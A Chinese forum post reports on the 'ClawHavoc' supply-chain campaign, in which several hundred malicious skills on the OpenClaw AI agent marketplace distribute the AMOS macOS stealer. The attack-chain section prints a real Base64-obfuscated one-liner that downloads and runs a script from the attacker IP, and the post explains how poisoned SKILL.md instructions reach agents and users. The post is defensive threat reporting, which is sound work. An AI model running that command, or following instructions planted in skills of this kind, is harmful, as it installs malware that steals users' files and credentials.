找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

1683

积分

0

好友

216

主题
发表于 2026-2-11 13:42:37 | 查看: 53| 回复: 0

OpenClaw供应链投毒攻击示意图

开源AI Agent平台OpenClaw正成为供应链投毒攻击的新目标。安全研究人员发现,攻击者已在其官方插件市场ClawHub上投放了数百个恶意的Skills模块,用于传播信息窃取程序,对用户数据安全构成了严重威胁。

OpenClaw与ClawHub的风险模式

OpenClaw是一个允许本地AI Agent通过插件(称为“Skills”)扩展功能的平台。这些Skills托管在名为ClawHub的官方市场中,遵循AgentSkills规范。然而,一个关键的设计缺陷在于,这些技能主要以包含可执行指令的SKILL.md文件形式存在,而非传统意义上可被代码审计工具扫描的源代码。

这种设计本质上是将Markdown文档转变为了一个潜在的操作系统命令执行入口,极易被攻击者滥用。加之ClawHub平台的上传流程相对宽松,缺乏严格的安全审核机制,其漏洞模式与历史上曾多次出现问题的npm或VS Code扩展市场类似。随着平台用户量的快速增长,它同时吸引了开发者和恶意攻击者的目光。

攻击规模:ClawHavoc行动

根据Koi Security的扫描报告,在检查的2,857个ClawHub Skills中,共发现了341个恶意样本,感染率高达12%。安全公司将此次攻击行动命名为 ClawHavoc。与此同时,SlowMist整合了超过400个样本的威胁指标(IOC),确认有472个受到影响的Skills共享相同的基础设施,这表明这是一次有组织、大规模的供应链攻击。

恶意Skills的特征与伪装

这些恶意Skills主要集中在以下几个类别进行伪装,以诱骗用户下载:

  • 加密货币工具:例如Solana价格追踪器、Phantom钱包助手等。
  • 日常实用程序:如YouTube视频下载器、内容管理工具。
  • 交易与市场工具:Polymarket预测市场机器人等。
  • 仿冒官方应用:使用“clawhub1”等与官方名称相似的ID。

它们通常伪装成“更新程序”、“系统安全检查工具”或“财务管理助手”,以规避用户和安全软件的初步检测。

攻击链与技术分析

攻击的核心在于篡改SKILL.md文件。攻击者会在文件的“前提条件”等部分嵌入经过Base64编码的两阶段攻击载荷。

当用户按照说明执行这些被篡改的指令时,就会触发攻击。例如,一个典型的恶意命令如下:

echo ‘L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=’ | base64 -D | bash

解码并执行上述命令后,会从攻击者控制的服务器(如91.92.242.30)下载并运行第一阶段脚本。该脚本随后会下载第二阶段的二进制有效载荷(例如名为x5ki60w1ih838sp7的文件)。

根据SlowMist的分析,这些最终投放的载荷是经过临时签名的Mach-O通用二进制文件,与知名的Atomic macOS Stealer(AMOS) 信息窃取程序匹配。该恶意软件会窃取用户桌面和文档目录中的文件,并通过命令与控制(C2)服务器(如socifiapp[.]com)外传数据,同时盗取系统钥匙串和各类浏览器的保存凭证。

在动态分析中,恶意程序还会弹出伪造的系统密码对话框进行钓鱼,并将窃取的.txt.pdf等文件打包成ZIP压缩包,通过curl命令上传至攻击者服务器。部分用于攻击的IP地址(如91.92.242.30)此前已与其他勒索软件组织活动相关联,进一步印证了此次攻击的威胁级别。

此外,攻击者还采用了更隐蔽的混淆方式。例如,在一个流行的“X(Twitter)趋势”Skill中,恶意代码被隐藏在仿冒的配置信息输出里。解码其Base64内容后,会从特定URL下载针对macOS文件夹的窃取程序。这种方法可以有效规避基于简单关键词的安全扫描,并允许攻击者快速更换最终的恶意载荷。

威胁指标(IOC)

以下为本次攻击活动中涉及的部分关键威胁指标,安全团队可用于进行排查和防护。

域名 IOC
ClawHavoc攻击相关域名IOC

URL IOC
ClawHavoc攻击相关URL IOC

IP IOC
ClawHavoc攻击相关IP IOC

文件 IOC
ClawHavoc攻击相关文件哈希IOC

总结与建议

OpenClaw的ClawHavoc事件再次凸显了开源软件供应链和插件生态系统的安全脆弱性。对于用户而言,在安装任何第三方扩展或技能时需保持高度警惕,尤其是来源不明或声称提供“破解”、“免费高级功能”的模块。对于平台方,建立严格的上传审核机制、引入代码签名和自动安全扫描流程已刻不容缓。

建议企业安全团队立即将上述IOC指标纳入威胁情报库进行监控和封堵,并对内部使用OpenClaw等AI Agent平台的环境进行安全检查。

参考来源:
OpenClaw Becomes New Target in Rising Wave of Supply Chain Poisoning Attacks
https://cybersecuritynews.com/openclaw-supply-chain-attacks/

本文涉及的安全技术与分析,可在云栈社区的安全板块找到更多深度讨论。




上一篇:一“玩”就收获:用AI快速开发一个带技能的“马六子”春节小游戏
下一篇:Gartner 2026网络安全趋势:AI安全、后量子密码与监管应对策略
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-2-23 12:57 , Processed in 0.552377 second(s), 41 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2026 云栈社区.

快速回复 返回顶部 返回列表